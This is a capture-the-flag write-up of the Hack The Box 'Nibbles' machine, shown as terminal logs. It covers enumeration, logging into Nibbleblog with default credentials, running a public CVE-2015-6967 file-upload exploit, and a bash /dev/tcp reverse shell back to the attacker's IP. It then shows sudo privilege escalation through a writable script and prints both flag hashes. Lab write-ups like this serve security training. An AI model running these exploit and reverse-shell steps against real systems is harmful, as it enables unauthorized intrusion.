HTB Nibbles done
Nibbles
OS:
Linux
Technology:
IP Address:
10.129.130.249
Open ports:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Users and pass:
Default login and password for Nibbles manager
L: admin
P: nibbles
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Nibbles]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.130.249_nmap 10.129.130.249 ; cat 10.129.130.249_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 21:02 UTC
Nmap scan report for 10.129.130.249
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Ffuz: http://10.129.130.249
Nothing interesing here
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Nibbles]
└─$ ffuf -u http://10.129.130.249/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.130.249_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.130.249/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.130.249_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 93, Words: 8, Lines: 17, Duration: 37ms]
:: Progress: [143283/143283] :: Job [1/1] :: 1298 req/sec :: Duration: [0:02:18] :: Errors: 0 ::
Check source of website
view-source:http://10.129.130.249/
---
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Ffuz: http://10.129.130.249/nibbleblog
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Nibbles]
└─$ ffuf -u http://10.129.130.249/nibbleblog/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.130.249_nibbleblog_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.130.249/nibbleblog/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.130.249_nibbleblog_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
LICENSE.txt [Status: 200, Size: 35148, Words: 5836, Lines: 676, Duration: 38ms]
README [Status: 200, Size: 4628, Words: 589, Lines: 64, Duration: 32ms]
admin [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 45ms]
[INFO] Adding a new job to the queue: http://10.129.130.249/nibbleblog/admin/FUZZ
admin.php [Status: 200, Size: 1401, Words: 79, Lines: 27, Duration: 58ms]
content [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://10.129.130.249/nibbleblog/content/FUZZ
feed.php [Status: 200, Size: 306, Words: 8, Lines: 8, Duration: 36ms]
index.php [Status: 200, Size: 2989, Words: 116, Lines: 61, Duration: 44ms]
install.php [Status: 200, Size: 78, Words: 11, Lines: 1, Duration: 31ms]
languages [Status: 301, Size: 331, Words: 20, Lines: 10, Duration: 32ms]
[INFO] Adding a new job to the queue: http://10.129.130.249/nibbleblog/languages/FUZZ
plugins [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 29ms]
[INFO] Adding a new job to the queue: http://10.129.130.249/nibbleblog/plugins/FUZZ
sitemap.php [Status: 200, Size: 404, Words: 33, Lines: 11, Duration: 42ms]
themes [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.129.130.249/nibbleblog/themes/FUZZ
update.php [Status: 200, Size: 1622, Words: 103, Lines: 88, Duration: 39ms]
[INFO] Starting queued job on target: http://10.129.130.249/nibbleblog/admin/FUZZ
ajax [Status: 301, Size: 332, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/ajax/
boot [Status: 301, Size: 332, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/boot/
controllers [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/controllers/
js [Status: 301, Size: 330, Words: 20, Lines: 10, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/js/
kernel [Status: 301, Size: 334, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/kernel/
templates [Status: 301, Size: 337, Words: 20, Lines: 10, Duration: 105ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/templates/
views [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 39ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/admin/views/
[INFO] Starting queued job on target: http://10.129.130.249/nibbleblog/content/FUZZ
private [Status: 301, Size: 337, Words: 20, Lines: 10, Duration: 43ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/content/private/
public [Status: 301, Size: 336, Words: 20, Lines: 10, Duration: 31ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/content/public/
tmp [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/content/tmp/
[INFO] Starting queued job on target: http://10.129.130.249/nibbleblog/languages/FUZZ
[INFO] Starting queued job on target: http://10.129.130.249/nibbleblog/plugins/FUZZ
about [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 41ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/about/
analytics [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/analytics/
categories [Status: 301, Size: 340, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/categories/
hello [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/hello/
pages [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 44ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/pages/
sponsors [Status: 301, Size: 338, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/plugins/sponsors/
[INFO] Starting queued job on target: http://10.129.130.249/nibbleblog/themes/FUZZ
echo [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/themes/echo/
medium [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.130.249/nibbleblog/themes/medium/
:: Progress: [143283/143283] :: Job [6/6] :: 1282 req/sec :: Duration: [0:02:10] :: Errors: 0 ::
Find details about blog
http://10.129.130.249/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content†writable by Apache/PHP
Optionals requirements
* PHP module - Mcrypt
===== Installation guide =====
1- Download the last version from http://nibbleblog.com
2- Unzip the downloaded file
3- Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
4- With your browser, go to the URL of your web. Example: www.domain-name.com
5- Complete the form
6- Done! you have installed Nibbleblog
===== About the author =====
Name: Diego Najar
E-mail: [email protected]
Linkedin: http://www.linkedin.com/in/dignajar
Exploit: CVE-2015-6967 - RCE Nibbler 4.0.3
https://github.com/FredBrave/CVE-2015-6967
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Nibbles]
└─$ git clone https://github.com/FredBrave/CVE-2015-6967.git
Cloning into 'CVE-2015-6967'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (1/1), done.
Run exploit
──(kali㉿kali)-[~/…/writeups/HTB/HTB_Nibbles/CVE-2015-6967]
└─$ python3 CVE-2015-6967.py --url http://10.129.130.249/ --username admin --password nibbles
[ + ] Login Succesfuly!
[+] Uploading shell...
[ * ] Shell has been uploaded!
---------------------------------------------------------------------------
cmd> /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.117/80 0>&1'
Create revshell
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Nibbles/CVE-2015-6967]
└─$ python3 CVE-2015-6967.py --url http://10.129.130.249/ --username admin --password nibbles
[ + ] Login Succesfuly!
[+] Uploading shell...
[ * ] Shell has been uploaded!
cmd> /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.117/80 0>&1'
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Nibbles]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.117] from (UNKNOWN) [10.129.130.249] 55606
bash: cannot set terminal process group (1356): Inappropriate ioctl for device
bash: no job control in this shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
Read flag: user.txt
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ find / -name "user.txt" 2>/dev/null
<ate/plugins/my_image$ find / -name "user.txt" 2>/dev/null
/home/nibbler/user.txt
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ id ; ip a ; cat /home/nibbler/user.txt
<ate/plugins/my_image$ id ; ip a ; cat /home/nibbler/user.txt
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:94:80:c6 brd ff:ff:ff:ff:ff:ff
inet 10.129.130.249/16 brd 10.129.255.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:80c6/64 scope global mngtmpaddr dynamic
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:80c6/64 scope link
valid_lft forever preferred_lft forever
357693b5662ed9f73bc7058fba60af6d
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
Privilege Escalation
Check sudo -l
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Check details about file: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls -l /home/nibbler/personal/stuff/monitor.sh
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$
nibbler@Nibbles:/home/nibbler$ cat /home/nibbler/personal/stuff/monitor.sh
cat /home/nibbler/personal/stuff/monitor.sh
####################################################################################################
# Tecmint_monitor.sh #
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/ #
# If any bug, report us in the link below #
# Free to use/edit/distribute the code below by #
# giving proper credit to Tecmint.com and Author #
# #
####################################################################################################
#! /bin/bash
# unset any variable which system may be using
# clear the screen
clear
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
while getopts iv name
do
case $name in
i)iopt=1;;
v)vopt=1;;
*)echo "Invalid arg";;
esac
done
if [[ ! -z $iopt ]]
then
{
wd=$(pwd)
basename "$(test -L "$0" && readlink "$0" || echo "$0")" > /tmp/scriptname
scriptname=$(echo -e -n $wd/ && cat /tmp/scriptname)
su -c "cp $scriptname /usr/bin/monitor" root && echo "Congratulations! Script Installed, now run monitor Command" || echo "Installation failed"
}
fi
if [[ ! -z $vopt ]]
then
{
echo -e "tecmint_monitor version 0.1\nDesigned by Tecmint.com\nReleased Under Apache 2.0 License"
}
fi
if [[ $# -eq 0 ]]
then
{
# Define Variable tecreset
tecreset=$(tput sgr0)
# Check if connected to Internet or not
ping -c 1 google.com &> /dev/null && echo -e '\E[32m'"Internet: $tecreset Connected" || echo -e '\E[32m'"Internet: $tecreset Disconnected"
# Check OS Type
os=$(uname -o)
echo -e '\E[32m'"Operating System Type :" $tecreset $os
# Check OS Release Version and Name
cat /etc/os-release | grep 'NAME\|VERSION' | grep -v 'VERSION_ID' | grep -v 'PRETTY_NAME' > /tmp/osrelease
echo -n -e '\E[32m'"OS Name :" $tecreset && cat /tmp/osrelease | grep -v "VERSION" | cut -f2 -d\"
echo -n -e '\E[32m'"OS Version :" $tecreset && cat /tmp/osrelease | grep -v "NAME" | cut -f2 -d\"
# Check Architecture
architecture=$(uname -m)
echo -e '\E[32m'"Architecture :" $tecreset $architecture
# Check Kernel Release
kernelrelease=$(uname -r)
echo -e '\E[32m'"Kernel Release :" $tecreset $kernelrelease
# Check hostname
echo -e '\E[32m'"Hostname :" $tecreset $HOSTNAME
# Check Internal IP
internalip=$(hostname -I)
echo -e '\E[32m'"Internal IP :" $tecreset $internalip
# Check External IP
externalip=$(curl -s ipecho.net/plain;echo)
echo -e '\E[32m'"External IP : $tecreset "$externalip
# Check DNS
nameservers=$(cat /etc/resolv.conf | sed '1 d' | awk '{print $2}')
echo -e '\E[32m'"Name Servers :" $tecreset $nameservers
# Check Logged In Users
who>/tmp/who
echo -e '\E[32m'"Logged In users :" $tecreset && cat /tmp/who
# Check RAM and SWAP Usages
free -h | grep -v + > /tmp/ramcache
echo -e '\E[32m'"Ram Usages :" $tecreset
cat /tmp/ramcache | grep -v "Swap"
echo -e '\E[32m'"Swap Usages :" $tecreset
cat /tmp/ramcache | grep -v "Mem"
# Check Disk Usages
df -h| grep 'Filesystem\|/dev/sda*' > /tmp/diskusage
echo -e '\E[32m'"Disk Usages :" $tecreset
cat /tmp/diskusage
# Check Load Average
loadaverage=$(top -n 1 -b | grep "load average:" | awk '{print $10 $11 $12}')
echo -e '\E[32m'"Load Average :" $tecreset $loadaverage
# Check System Uptime
tecuptime=$(uptime | awk '{print $3,$4}' | cut -f1 -d,)
echo -e '\E[32m'"System Uptime Days/(HH:MM) :" $tecreset $tecuptime
# Unset Variables
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
shift $(($OPTIND -1))
Edit file: /home/nibbler/personal/stuff/monitor.sh
ibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al monitor.sh
ls -al monitor.sh
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash -i" >> monitor.sh
echo "bash -i" >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$
Read flag: root.txt
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
bash: cannot set terminal process group (1348): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler/personal/stuff#
root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# id ; ip a ; cat root.txt
id ; ip a ; cat root.txt
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:94:8e:f7 brd ff:ff:ff:ff:ff:ff
inet 10.129.109.51/16 brd 10.129.255.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:8ef7/64 scope global mngtmpaddr dynamic
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:fe94:8ef7/64 scope link
valid_lft forever preferred_lft forever
cf888e2a44127f856429082590488197
root@Nibbles:~#
References
[CVE-2015-6967 - RCE Nibbler 4.0.3](https://github.com/FredBrave/CVE-2015-6967)
Lessons Learned